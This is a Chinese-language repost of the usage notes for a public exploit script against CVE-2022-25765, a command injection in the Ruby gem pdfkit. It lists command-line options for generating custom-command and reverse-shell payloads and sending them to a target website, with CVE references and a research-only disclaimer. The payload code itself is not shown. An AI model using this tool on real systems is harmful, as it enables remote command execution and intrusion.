漏洞利用说明
ruby gempdfkit通常用于将网站或 HTML 转换为 PDF 文档。可以向该软件的易受攻击版本 (< 0.8.7.2) 传递一个包含将要执行的命令的特制 URL。此漏洞利用生成可执行 URL 或将它们发送到运行pdfkit.
用法
python3 exploit-CVE-2022–25765.py -c <command>
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022–25765.py -h
选项
-c Custom command mode. Provide command to generate custom payload with.
-s Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
-w URL of website running vulnerable pdfkit. (Optional)
-p POST parameter on website running vulnerable pdfkit. (Optional)
-h Show this help menu.
下载
在此处下载 exploit-CVE-2022-25765.py
利用要求
-
python3
-
python3:requests
-
python3:urllib3
演示
自定义命令模式
反向 Shell 发送到目标网站模式
测试于
pdfkit 版本 0.8.6
适用于
pdfkit 版本 < 0.8.7.2
测试环境
gem install pdfkit -v 0.8.6学分
-
https://nvd.nist.gov/vuln/detail/CVE-2022-25765
-
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
项目地址:https://github.com/UNICORDev/exploit-CVE-2022-25765
原文始发于微信公众号(Ots安全):针对 CVE-2022–25765 的漏洞利用 (pdfkit) - 命令注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论